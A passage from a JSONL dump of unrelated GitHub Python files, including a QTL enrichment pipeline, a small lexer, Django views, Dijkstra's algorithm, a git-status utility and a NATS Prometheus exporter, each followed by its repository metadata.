[self.adata[vv]]\n #\n \n #|endfor\n \n if n > 0:\n lavg = float(lavg)/float(n)\n else:\n lavg = 0\n #\n \n self.binavgL += [lavg]\n bgn += dspan; end += dspan\n #|endfor\n #\n \n \n \n def showBinSliceOpen(self, kslice, option):\n \n if kslice >= len(self.binlist):\n print (\"ERROR: bins are between 0 and %d\" % len(self.binlist))\n sys.exit(1)\n #\n \n dataset = self.bins[kslice]\n dataset = insSortListByIndex(dataset, lbls[\"open\"])\n \n index = str(kslice).zfill(2)\n oflnm = (self.flhd + \"_open_\" + option + \"_\" + index + \".dat\")\n print (\"making \", oflnm)\n fp = open(oflnm, 'w')\n s = (\"# open %s\\n\" % option)\n s += (\"# \" + self.showGDrange(kslice) + '\\n')\n s += (\"# \" + self.showStats() + '\\n')\n s += (\"# open %s\\n\" % fldInfo[\"open\"])\n s += (\"# %-10s %s\\n\" % (option, fldInfo[option]))\n \n s += (\"\\n#open %-15s span \\n\" % option)\n s += (\"# %-15s [/5kbp]\\n\" % fldUnits[option])\n \n fp.write(s)\n for k in range(0, len(dataset)):\n dt = dataset[k]\n s = (\"%8.4f %8.2f %4d\" % (dt[lbls[\"open\"]], dt[lbls[option]], dt[lbls[\"len\"]]))\n fp.write(s + '\\n')\n #print (s)\n #|endfor\n \n fp.close()\n \n #\n \n \n def showBinSliceActive(self, kslice, option):\n if kslice >= self.binsize:\n print (\"ERROR: bins are between 0 and %d\" % len(self.binlist))\n sys.exit(1)\n #\n \n dataset = self.bins[kslice]\n dataset = insSortListByIndex(dataset, lbls[\"active\"])\n \n index = str(kslice).zfill(2)\n oflnm = (self.flhd + \"_active_\" + option + \"_\" + index + \".dat\")\n print (\"making \", oflnm)\n fp = open(oflnm, 'w')\n s = (\"# active %s\\n\" % option)\n s += (\"# \" + self.showGDrange(kslice) + '\\n')\n s += (\"# \" + self.showStats() + '\\n')\n s += (\"# active %s\\n\" % fldInfo[\"active\"])\n s += (\"# %-10s %s\\n\" % (option, fldInfo[option]))\n \n s += (\"\\n#active %-15s span \\n\" % option)\n s += (\"# %-15s [/5kbp]\\n\" % fldUnits[option])\n #print (s)\n fp.write(s)\n \n for k in range(0, len(dataset)):\n dt = dataset[k]\n s = (\"%8.4f %8.2f %4d\" % (dt[lbls[\"active\"]], dt[lbls[option]], dt[lbls[\"len\"]]))\n fp.write(s + '\\n')\n #print (s)\n \n #|endfor\n \n fp.close()\n\n #\n\n#\n\ndef main(cl):\n print (cl)\n \n parser = argparse.ArgumentParser()\n \n \n parser.add_argument('-numbins', action='store', default=20,\n dest='nbins', type=int,\n help='how many bins to divide the data.')\n \n parser.add_argument('-bins', nargs=\"+\", default=[10],\n dest='kslices',\n help='which bins to read and display.')\n \n parser.add_argument('-f', action='store', default=\"test_loops_results_all_190528.dat\",\n dest='inflnm', type=str,\n help='which data file to read')\n \n parser.add_argument('-options', nargs=\"+\", default=[\"dGbar\"],\n dest='options',\n help='which fields to show.')\n \n parser.add_argument('-showOpts', action='store_true',\n default=False,\n dest='showOpts', \n help='provides a list of options')\n \n args = parser.parse_args()\n \n flnm = args.inflnm\n bins = []\n for k in args.kslices:\n bins += [int(k)]\n #\n \n nbins = int(args.nbins)\n opts = args.options\n sOpts = args.showOpts\n if sOpts:\n showOptions()\n sys.exit(0)\n #\n \n \"\"\"\n print (flnm)\n print (bins)\n print (nbins)\n print (opts)\n print (args.showOpts)\n showOptions()\n sys.exit(0)\n \"\"\"\n \n gop = GenomicOrderParams()\n gop.readAnalLoopData(flnm)\n \n gop.binnedData(nbins)\n for k in bins:\n for opt_l in opts:\n print (\"Active\")\n gop.showBinSliceActive(k, opt_l)\n print (\"Open\")\n gop.showBinSliceOpen(k, opt_l)\n #|endfor\n\n #|endfor\n \n \n#\n\n\n\nif __name__ == '__main__':\n # running the program\n main(sys.argv)\n#\n\n","repo_name":"plewczynski/looper","sub_path":"chreval/bin_data_by_genomic_distance.py","file_name":"bin_data_by_genomic_distance.py","file_ext":"py","file_size_in_byte":14807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"32119566550","text":"#!/usr/bin/env python3\n\n\"\"\"\nQTLEnrichV2 was written under the direction and supervision of Ayellet Segre\nat Massachusetts Eye and Ear, Department of Ophthalmology and Ocular Genomics Institute\n\nAuthor: Andrew Hamel\n\nCode written in Python version 3.6\n\nQTLEnrichV2 assesses enrichment of gwas variant associations amongst qtls in\na given tissue correcting for potential confounding factors \n(MAF, distance to TSS, local LD).\n\"\"\"\n\nimport sys\nimport os\nimport os.path\nimport re\nimport argparse\nimport logging\nimport datetime\nimport pandas as pd \nimport numpy as np\nimport os_sys_qtlenrich\nimport qtl_gwas_parsing \nimport rand_null_samp_permute_matching_confounders\nimport compute_fold_enrichments\nimport output_table\nimport GeneEnrich_inputs\n\nif __name__ == \"__main__\":\n\n args = os_sys_qtlenrich.parse_args()\n\n #check specific arguments\n os_sys_qtlenrich.raise_error_gencode_file(args)\n\n #retrieve dates\n date,month_date = os_sys_qtlenrich.retrieve_current_date()\n\n #parse exp label\n exp_label = os_sys_qtlenrich.parse_exp_label(args.exp_label)\n\n #Extract gwas Trait name\n gwas_trait = qtl_gwas_parsing.extract_gwas_trait_name(args.gwas_file,args.trait_name)\n\n #Create output directory\n output_directory = os_sys_qtlenrich.create_output_directory(args,month_date,exp_label)\n\n #create pvalues directory\n output_files_directory = os_sys_qtlenrich.create_output_files_directory(output_directory)\n\n #extract arguments\n arguments,parameters = os_sys_qtlenrich.extract_qtlenrich_arguments(args)\n\n #create and write to log file\n log_file = os_sys_qtlenrich.write_initial_logfile(output_directory,date,gwas_trait,args.qtl_type,arguments,parameters,exp_label)\n\n #Select appropriate files\n qtl_files = qtl_gwas_parsing.extract_qtl_files(args.qtl_directory,args.file_name)\n\n if args.subset_tissues:\n qtl_files = os_sys_qtlenrich.subset_qtl_files(qtl_files,args.file_name,args.tissue_names)\n\n #interaction qtl dict\n interaction_qtl_dict = qtl_gwas_parsing.interaction_qtl_dictionary(args.qtl_type,args.file_name,qtl_files)\n\n #parse gwas\n print(\"preparing gwas\")\n with open(log_file,\"a+\") as f:\n f.write(\"Preparing gwas\\n\")\n gwas = qtl_gwas_parsing.prepare_gwas_file(args.gwas_file,args.genome_build)\n\n print(\"Preparing confounders and null table...\\nThis may take a few minutes\\n\")\n with open(log_file,\"a+\") as f:\n f.write(\"Preparing confounders and null table...\\nThis may take a few minutes\\n\")\n\n #parse confounders and null tables\n confounders_table = qtl_gwas_parsing.read_confounders_table(args.confounders_table)\n null_table = qtl_gwas_parsing.prepare_null_table(args.null_table,gwas)\n\n print(\"parsing qtls\\n\")\n with open(log_file,\"a+\") as f:\n f.write(\"parsing qtls\\n\")\n\n gencode = qtl_gwas_parsing.declare_gencode(args)\n\n significant_qtl_dict,significant_qtl_gwas_dict,geneenrich_input_gwas_dict = qtl_gwas_parsing.parse_qtls(output_files_directory,month_date,gwas_trait,qtl_files,args.qtl_directory,args.qtl_type,args.file_name,gwas,args.qtl_q_value,args.independent_ranking,args.compute_tss_distance,gencode,args.subset_genes,args.null_option,keep_gene_id_suffix)\n\n #Generate GeneEnrich Inputs if necessary\n if args.GeneEnrich_input:\n if args.qtl_type == \"dapg_independent\" or args.qtl_type == \"conditional_independent\":\n\n #GeneEnrich input files for independent eQTLs requires additional files\n os_sys_qtlenrich.check_independent_GeneEnrich_parameters(args)\n\n GeneEnrich_inputs.create_GeneEnrich_inputs_independent_qtls(args.eGenes_directory,args.eGene_file_name,gwas,gwas_trait,output_directory,date,geneenrich_input_gwas_dict,args.qtl_type,p=args.gwas_p_value,q=args.qtl_q_value,independent_ranking=args.independent_ranking,gencode=gencode,subset_genes=args.subset_genes)\n else:\n GeneEnrich_inputs.create_GeneEnrich_inputs_best_eqtl_sqtl(gwas_trait,output_directory,date,geneenrich_input_gwas_dict,args.qtl_type,exp_label,p=args.gwas_p_value,q=args.qtl_q_value)\n\n del geneenrich_input_gwas_dict, gwas\n\n print(\"computing observed fold-enrichment\")\n with open(log_file,\"a+\") as f:\n f.write(\"computing observed fold-enrichment\\n\")\n\n #Compute qtl Statistics\n trait_dict,original_length_dict,observed_fold,obs_dict,best_eqtl_variants_dict = compute_fold_enrichments.compute_qtl_statistics(gwas_trait,significant_qtl_dict,significant_qtl_gwas_dict,args.gwas_p_value)\n\n #perform random sampling of matched null variants\n enrichment_p_value_dict,adjusted_fold_enrichment_dict,upper_bound_confidence_interval_dict,lower_bound_confidence_interval_dict,pi_1_dict,true_trait_dict = rand_null_samp_permute_matching_confounders.sample_match_null_confounders(log_file,month_date,output_files_directory,args.qtl_type,gwas_trait,confounders_table,null_table,significant_qtl_gwas_dict,observed_fold,args.gwas_p_value,null_option=args.null_option,num_permutations=args.lower_bound_permutations,upper_bound_permutations=args.upper_bound_permutations,lambda_factor=args.lambda_factor,independent_ranking=args.independent_ranking,compute_tss_distance=args.compute_tss_distance,keep_null_variants=args.keep_null_variants,keep_pvalue_matrix=args.keep_pvalue_matrix,interaction_qtl_dict=interaction_qtl_dict,num_quantiles=args.num_quantiles)\n\n #create Output table\n output_table = output_table.create_output_table(trait_dict,original_length_dict,best_eqtl_variants_dict,observed_fold,obs_dict,enrichment_p_value_dict, adjusted_fold_enrichment_dict,upper_bound_confidence_interval_dict,lower_bound_confidence_interval_dict,pi_1_dict,true_trait_dict)\n\n #write output tables\n results_directory = os_sys_qtlenrich.create_results_directory(output_directory)\n output_filename = os_sys_qtlenrich.create_output_filename(results_directory,month_date,gwas_trait,args.qtl_type,args.independent_ranking,exp_label)\n\n with open(log_file,\"a+\") as f:\n f.write(\"Creating QTLEnrich output table. QTLEnrich is complete.\\n\")\n\n output_table.to_csv(output_filename,index=None,sep=\"\\t\")\n\n","repo_name":"segrelabgenomics/QTLEnrich","sub_path":"src/QTLEnrichV2.py","file_name":"QTLEnrichV2.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"40446504588","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\" TOKENS \n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# TipoToken\nTT_INT = \"INT\"\nTT_FLOAT = \"FLOAT\"\nTT_EQ = \"IGUAL\"\nTT_IDENTIFIER = \"IDENTIFICADOR\"\nTT_ASIGN = \"ASIGNACION\"\n\nDIGIT = '0123456789'\nLETTERS = 'abcdefghijklmnopqrstwxyzABCDEFGHIJKLMNOPQRSTWXYZ'\n\nclass Token:\n def __init__(self, tpe, value=None):\n self._type = tpe\n self._value = value\n\n def __repr__(self):\n if self._value: return f'{self._type}:{self._value}'\n return f'{self._type}' \n\n # Regresa el valor del Token\n def Value(self):\n if self._value != None:\n return self._value\n # Regresa el tipo del Token\n def Type(self):\n return self._type\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\" ERRORES\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nclass Error:\n def __init__(self, pos_start, pos_end, error_name, details):\n self._pos_start = pos_start\n self._pos_end = pos_end\n self._error_name = error_name\n self._details = details\n \n def as_string(self):\n result = f'{self._error_name}: {self._details}\\n'\n pos = self._pos_start._ln+1\n result += f'Archivo {self._pos_start._fn}, line {pos}'\n return result\n\nclass IllegalCharError(Error):\n def __init__(self, pos_start, pos_end, details):\n super().__init__(pos_start, pos_end, 'Caracter Invalido', details)\n\n# Error en la definicion de la variable\nclass IllegalVariableError(Error):\n def __init__(self, pos_start, pos_end, details):\n super().__init__(pos_start, pos_end, 'Declaración de variable invalida ', details)\n\nclass Position:\n def __init__(self, idx, ln, col, fn, fntxt):\n self._idx = idx\n self._ln = ln\n self._col = col\n self._fn = fn\n self._fntxt = fntxt\n\n def advance(self, current_char):\n self._idx += 1\n self._col += 1\n if current_char == '\\n':\n self._ln += 1\n self._col += 0\n return self\n \n def copy(self):\n return Position(self._idx, self._ln, self._col, self._fn, self._fntxt)\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\" Mini analizador léxico\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nclass Lexer:\n def __init__(self, fn, text):\n self._fn = fn\n self._text = text\n self._pos = Position(-1, 0, -1, fn, text) \n self._current_char = None\n self.advance()\n \n def advance(self):\n self._pos.advance(self._current_char)\n self._current_char = self._text[self._pos._idx] if self._pos._idx < len(self._text) else None\n \n def make_number(self):\n num_str = ''\n dot_count = 0\n\n while self._current_char != None and self._current_char in DIGIT + '.':\n if self._current_char == '.':\n if dot_count == 1: break\n dot_count += 1\n num_str += '.'\n else:\n num_str += self._current_char\n self.advance()\n if dot_count == 0:\n return Token(TT_INT, int(num_str))\n else:\n return Token(TT_FLOAT, float(num_str))\n\n def make_identifier(self):\n id_str = ''\n pos = self._pos.copy()\n while self._current_char != None and self._current_char in LETTERS:\n id_str += self._current_char\n self.advance()\n return Token(TT_IDENTIFIER, id_str)\n\n def analyze(self):\n tokens = []\n count = self._text.count('=')\n\n if count > 1:\n pos = self._pos.copy()\n char = self._current_char\n self.advance()\n return [], IllegalVariableError(pos, self._pos, '-> ', self._text)\n elif count == 1:\n name = self._text.split('=')[0]\n tokens.append(Token(TT_IDENTIFIER, name))\n for n in range(len(name)):\n self.advance()\n tokens.append(self.make_tokens(tokens)[0])\n return tokens, None\n else:\n tokens = self.make_tokens(tokens)[0]\n return tokens, None\n\n def make_tokens(self, tokens):\n # tokens = []\n\n while self._current_char != None:\n if self._current_char in '\\t' or self._current_char == ' ':\n self.advance()\n elif self._current_char in DIGIT:\n tokens.append(self.make_number())\n elif self._current_char == '=':\n tokens.append(Token(TT_ASIGN))\n self.advance()\n else:\n pos = self._pos.copy()\n char = self._current_char\n self.advance()\n return [], IllegalCharError(pos, self._pos, \"'\" + char + \"'\")\n return tokens, None\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\ndef make_identifier(text):\n if ' '.join(map(str, text)).count('=') == 1:\n num = float(' '.join(map(str, text)).split('=')[-1])\n else:\n num = float(text)\n return num\n\ndef run(fn, text):\n lexer = Lexer(fn, text)\n tokens, error = lexer.analyze()\n return tokens, error","repo_name":"YisusCristo/STraductoresII","sub_path":"Modulo 1 -Mini Léxcio/lexico.py","file_name":"lexico.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29333423321","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nfrom .models import Post\nfrom django.http import HttpResponse\n\n# Create your views here.\n\nclass EntryList(ListView):\n\ttemplate_name = 'base.html'\n\tmodel = Post\n\n\n\tdef get(self, request):\n\t\tprint('Hawkguy!')\n\t\tposts = Post.objects.all()\n\t\tprint(posts)\n\t\treturn HttpResponse(posts)\n\t\t\n\nclass EntryDetail(DetailView):\n\ttemplate_name = 'detail.html'\n\t\n\tqueryset = Post.objects.all()\n","repo_name":"Rayxclockwork/django-models","sub_path":"comics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"40953316883","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 20 20:45:29 2019\n\n@author: yangyutu123\n\"\"\"\n\nimport math\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pylab as plt\n\nimport numpy as np\nscale = 2\nvec1 = np.array([2.0, 0.0])*2\nvec2 = np.array([2.0 * math.cos(np.pi / 3.0), 2.0 * math.sin(np.pi / 3.0)])*2\n\nq = deque()\nq.append(np.array([0.0, 0.0]))\n\nN = 1000\nconfig = []\n\n# put in first line\nfor i in range(50):\n p = q[-1]\n p1 = p + vec1 + (np.random.random(2) - np.array([0.5, 0.5]))\n q.append(p1)\n\nfor p in q:\n config.append(p)\n\nfor i in range(N):\n p = q[0]\n q.popleft()\n p2 = p + vec2 + (np.random.random(2) - np.array([0.5, 0.5]))\n q.append(p2)\n config.append(p2)\n\nconfig = np.array(config)\n\nplt.close('all')\nplt.figure(1)\n\nplt.scatter(config[:, 0], config[:, 1])\n\nconfig[:, 0] = config[:, 0] - np.mean(config[:, 0])\nconfig[:, 1] = config[:, 1] - np.mean(config[:, 1])\n\ndist = np.sqrt(config[:, 0] ** 2 + config[:, 1] ** 2)\n\ndistSortIdx = np.argsort(dist)\n\nN = 300\n\nconfigOut = config[distSortIdx[0:N], :]\n\nplt.figure(2)\nplt.scatter(configOut[:, 0], configOut[:, 1])\n\noutput = np.array([list(np.arange(N)), list(configOut[:,0]), list(configOut[:,1]), list(np.zeros(N))]).T\n\nnp.savetxt('RandomConfigN300_0.txt', output)","repo_name":"yangyutu/DeepReinforcementAssembly","sub_path":"BDModel/generateRandomConfig.py","file_name":"generateRandomConfig.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33584225975","text":"# https://www.acmicpc.net/problem/15956\n\n\n\"\"\"\n다익스트라 알고리즘을 활용한 문제\n어느 한 정점에서 복수의 정점에 대해 최단거리를 구해야 하고\n간선에 음의 가중치가 없으므로 다익스트라 알고리즘을 사용\n반드시 거쳐야 하는 정점 P, Q에 대해 다익스트라 알고리즘을 실행하여\n최단거리의 합 중 최소값을 찾는다\n\"\"\"\n\n\nimport sys, heapq\ninput = sys.stdin.readline\n\nN, E = map(int, input().split())\ngraph = [[] for _ in range(N)]\n\n# 출발 지점을 0, 도착 지점을 N-1이라 가정\nfor _ in range(E):\n a, b, c = map(int, input().split())\n graph[a-1].append([b-1, c])\n graph[b-1].append([a-1, c])\n\nP, Q = map(lambda x: int(x)-1, input().split())\n\n\ndef dijkstra(start):\n dists = [float('inf')] * N\n heap = []\n dists[start] = 0\n heap.append([0, start])\n\n while heap:\n dist, vertex = heapq.heappop(heap)\n if dist > dists[vertex]:\n continue\n\n for next_vertex, next_cost in graph[vertex]:\n if dists[next_vertex] > dist + next_cost:\n dists[next_vertex] = dist + next_cost\n heapq.heappush(heap, [dists[next_vertex], next_vertex])\n\n return dists\n\n\ndist_from_0 = dijkstra(0) # distances from 0\ndist_from_P = dijkstra(P) # distances from P\ndist_from_Q = dijkstra(Q) # distances from Q\n\na = dist_from_0[P] # 0 -> P\nb = dist_from_0[Q] # 0 -> Q\nc = dist_from_P[Q] # p -> Q ( == Q -> P)\nd = dist_from_P[-1] # P -> (N-1)\ne = dist_from_Q[-1] # Q -> (N-1)\n\nanswer = min(a+e, b+d) + c\nprint(answer) if answer != float('inf') else print(-1)\n\n","repo_name":"ChoiHeon/algorithm","sub_path":"02_백준/[1504] 특정한 최단 경로.py","file_name":"[1504] 특정한 최단 경로.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"7312496900","text":"# Jason Hilliard and Jeff Wu\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nclass TwoLayerNN():\r\n def __init__(self, input_dim, output_dim):\r\n self.theta = np.random.randn(input_dim, int(output_dim)) / np.sqrt(input_dim)\r\n self.bias = np.zeros((1, int(output_dim)))\r\n\r\n # --------------------------------------------------------------------------\r\n\r\n def compute_cost(self, X, y):\r\n\r\n num_examples = np.shape(X)[0]\r\n z = np.dot(X, self.theta) + self.bias\r\n exp_z = np.exp(z)\r\n softmax_scores = exp_z / np.sum(exp_z, axis=1, keepdims=True)\r\n\r\n one_hot_y = np.zeros((num_examples, int(np.max(y)) + 1))\r\n logloss = np.zeros((num_examples,))\r\n for i in range(np.shape(X)[0]):\r\n one_hot_y[i, int(y[i])] = 1\r\n logloss[i] = -np.sum(np.log(softmax_scores[i, :]) * one_hot_y[i, :])\r\n data_loss = np.sum(logloss)\r\n return 1. / num_examples * data_loss\r\n\r\n # --------------------------------------------------------------------------\r\n\r\n def predict(self, X):\r\n\r\n z = np.dot(X, self.theta) + self.bias\r\n exp_z = np.exp(z)\r\n softmax_scores = exp_z / (exp_z + 1)\r\n predictions = np.argmax(softmax_scores, axis=1)\r\n return predictions\r\n\r\n # --------------------------------------------------------------------------\r\n\r\n def train(self, X, y, num_epochs, lr=0.01):\r\n for epoch in range(0, num_epochs):\r\n\r\n # Forward propagation\r\n z = np.dot(X, self.theta) + self.bias\r\n exp_z = np.exp(z)\r\n softmax_scores = exp_z / np.sum(exp_z, axis=1, keepdims=True)\r\n\r\n # Backpropagation\r\n beta = np.zeros_like(softmax_scores)\r\n one_hot_y = np.zeros_like(softmax_scores)\r\n for i in range(X.shape[0]):\r\n one_hot_y[i, int(y[i])] = 1\r\n beta = softmax_scores - one_hot_y\r\n\r\n # Compute gradients of model parameters\r\n dtheta = np.dot(X.T, beta)\r\n dbias = np.sum(beta, axis=0)\r\n\r\n # Gradient descent parameter update\r\n self.theta -= lr * dtheta\r\n self.bias -= lr * dbias\r\n","repo_name":"jrhill95/440-Project-1","sub_path":"NeuralNetModified/twolnn.py","file_name":"twolnn.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70929004595","text":"from django.contrib import admin\nfrom .models import EventMetherologic\n\n\nclass EventMetherologicAdmin(admin.ModelAdmin):\n list_filter = [\n 'position',\n 'where',\n 'status'\n ]\n list_display = [\n 'position_name',\n 'details',\n 'where',\n 'position',\n 'status',\n ]\n list_per_page = 50\n \nadmin.site.register(EventMetherologic, EventMetherologicAdmin)","repo_name":"greghonox/django","sub_path":"core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"17638559556","text":"import os\nimport subprocess\nfrom collections.abc import Iterator\nfrom typing import Any\n\n\ndef list_directories(path: str) -> list[str]:\n \"\"\"\n List only directories in a path.\n \"\"\"\n return next(os.walk(path))[1]\n\n\ndef flatten(items: list[Any] | tuple[Any, ...]) -> Iterator[Any]:\n \"\"\"\n Flatten a nested list or tuple.\n\n Examples:\n list(flatten([\"a\", \"b\", [1, \"z\"]]))\n \"\"\"\n for item in items:\n if isinstance(item, (list, tuple)):\n yield from flatten(item)\n else:\n yield item\n\n\ndef sort_by_basename(arr: tuple[str, ...]) -> tuple[str, ...]:\n \"\"\"\n Sort a tuple containing paths by the basename.\n\n Examples:\n paths = (\"abc/z\", \"def/a\")\n sort_by_basename(paths)\n \"\"\"\n sorted_arr = tuple(\n sorted(arr, key=lambda a: os.path.splitext(os.path.basename(a))[0])\n )\n return sorted_arr\n\n\ndef fancy_text(text: str, color: str, styles: tuple[str, ...] | None = None) -> str:\n \"\"\"\n Prints string with ANSI colors on terminal.\n \"\"\"\n\n ansi_codes = {\n \"parameters\": {\n \"reset\": \"0\",\n \"bold\": \"1\",\n \"italic\": \"3\",\n \"underline\": \"4\",\n },\n \"colors\": {\n \"black\": \"30\",\n \"red\": \"31\",\n \"green\": \"32\",\n \"yellow\": \"33\",\n \"blue\": \"34\",\n \"magenta\": \"35\",\n \"cyan\": \"36\",\n \"white\": \"37\",\n \"gray\": \"90\",\n },\n }\n\n # wrap escape characters:\n for section in ansi_codes:\n ansi_codes[section] = dict(\n zip(\n ansi_codes[section].keys(),\n map(lambda x: f\"\\033[{x}m\", ansi_codes[section].values()),\n )\n )\n\n if styles is not None:\n text_styles = \"\".join([ansi_codes[\"parameters\"][style] for style in styles])\n else:\n text_styles = \"\"\n\n text = \"{styles}{color}{text}{reset}\".format(\n styles=text_styles,\n color=ansi_codes[\"colors\"][color],\n text=text,\n reset=ansi_codes[\"parameters\"][\"reset\"],\n )\n return text\n\n\ndef check_git_installed():\n \"\"\"\n Checks if git is installed on the system. Exits the program if it is not\n installed.\n \"\"\"\n import shutil\n\n cmd = shutil.which(\"git\")\n if cmd is None:\n raise SystemError(\"Error: git is not found\")\n\n\ndef run_git_command(path: str, what: list[str]) -> dict:\n \"\"\"\n Run a git command in a path.\n\n :param path str: path to run the git command.\n :param what List[str]: which command(s) to run.\n\n Details:\n -C comes from that as if git was started in instead\n of the current working directory.\n \"\"\"\n cmd = list(flatten([\"git\", \"-C\", os.path.expanduser(path), what]))\n proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)\n res = {\"status\": False, \"output\": \"\"}\n res[\"status\"] = True if proc.returncode == 0 else False\n res[\"output\"] = proc.stdout.decode(\"utf-8\")\n return res\n\n\ndef display_table(cols):\n # get highest character length from each column\n max_length = []\n for col in cols:\n highest = len(max(col, key=len))\n max_length.append(highest)\n\n rows = zip(*cols)\n\n for row in rows:\n print(\"\\u2022\", end=\" \")\n for i, _ in enumerate(row):\n value = row[i]\n max_len = max_length[i]\n fmt_value = value.ljust(max_len)\n print(fmt_value, end=\" \")\n print(\"\")\n","repo_name":"strboul/git-substatus","sub_path":"git_substatus/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"19598461206","text":"import asyncio\n\nimport nats.aio.client\nimport nats.js.api\nfrom litestar import Litestar, get\nfrom litestar.datastructures import ResponseHeader, State\n\nfrom nats_js_prom import config\n\n\n@get('/', response_headers=[ResponseHeader(name='Content-Type', value='text/plain; version=0.0.4')])\nasync def metrics_handler(state: State) -> str:\n nc: nats.aio.client.Client = state.nc\n cfg: config.Config = state.cfg\n js = nc.jetstream(domain=cfg.stream_domain)\n cons = await js.add_consumer(cfg.stream_name, nats.js.api.ConsumerConfig(inactive_threshold=10))\n sub = await js.pull_subscribe('', cons.name, cfg.stream_name)\n pending = cons.num_pending or 0\n ret = []\n for _ in range(pending):\n msgs = await sub.fetch(1)\n acks = []\n for msg in msgs:\n try:\n to_parse = msg.data.decode('utf-8')\n if to_parse in cfg.value_mapping:\n to_parse = cfg.value_mapping[to_parse]\n value = float(to_parse)\n label = msg.subject.replace('.', '_').replace('-', '_')\n if cfg.export_prefix:\n label = f'{cfg.export_prefix}_{label}'\n ret.append(f'{label} {value}')\n except ValueError:\n print(f'Failed to parse {msg.data} as float')\n finally:\n acks.append(msg.ack())\n await asyncio.gather(*acks)\n await js.delete_consumer(cfg.stream_name, cons.name)\n return '\\n'.join(ret)\n\nasync def setup_nats(app: Litestar) -> None:\n \"\"\"Setup NATS connection and add it to the app state\"\"\"\n print(\"I am making a new connection!\")\n cfg = app.state.cfg\n nc = await nats.connect(cfg.nats_url, user_credentials=cfg.nats_creds_path)\n app.state.nc = nc\n\nasync def close_nats(app: Litestar) -> None:\n \"\"\"Close NATS connection\"\"\"\n print(\"I am closing the connection!\")\n await app.state.nc.close()\n\ndef create_app(cfg: config.Config) -> Litestar:\n app = Litestar(route_handlers=[metrics_handler],\n debug=cfg.debug, on_startup=[setup_nats],\n on_shutdown=[close_nats],\n state=State({\"cfg\": cfg}))\n\n return app\n","repo_name":"m3nowak/nats-js-prom","sub_path":"src/nats_js_prom/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"25664064350","text":"from setuptools import setup\n\npackage_name = 'autonomy_hmi'\nui_name = 'window.ui'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/ament_index/resource_index/packages',\n ['resource/' + ui_name]),\n ('share/ament_index/resource_index/packages',\n ['resource/' + 'style.qss']),\n ('share/' + package_name, ['package.xml']),\n\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='igvcsp2022',\n maintainer_email='max.desantis@okstate.edu',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'gui_node = autonomy_hmi.gui_node:main',\n 'joy_pub_node = autonomy_hmi.joy_pub_node:main',\n 'joy_motion_mapper_node = autonomy_hmi.joy_motion_mapper_node:main'\n ],\n },\n)\n","repo_name":"osu-igvc/autonomy_hmi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37622529142","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n self.cars_list = []\n self.car_speed = STARTING_MOVE_DISTANCE\n\n def create_car(self):\n new_car = Turtle()\n new_car.shape(\"square\")\n new_car.shapesize(stretch_len=2)\n new_car.color(random.choice(COLORS))\n new_car.penup()\n new_car.goto(x=300, y=random.randint(-250, 250))\n self.cars_list.append(new_car)\n\n def move_cars(self):\n for car in self.cars_list:\n car.goto(x=car.xcor() - self.car_speed, 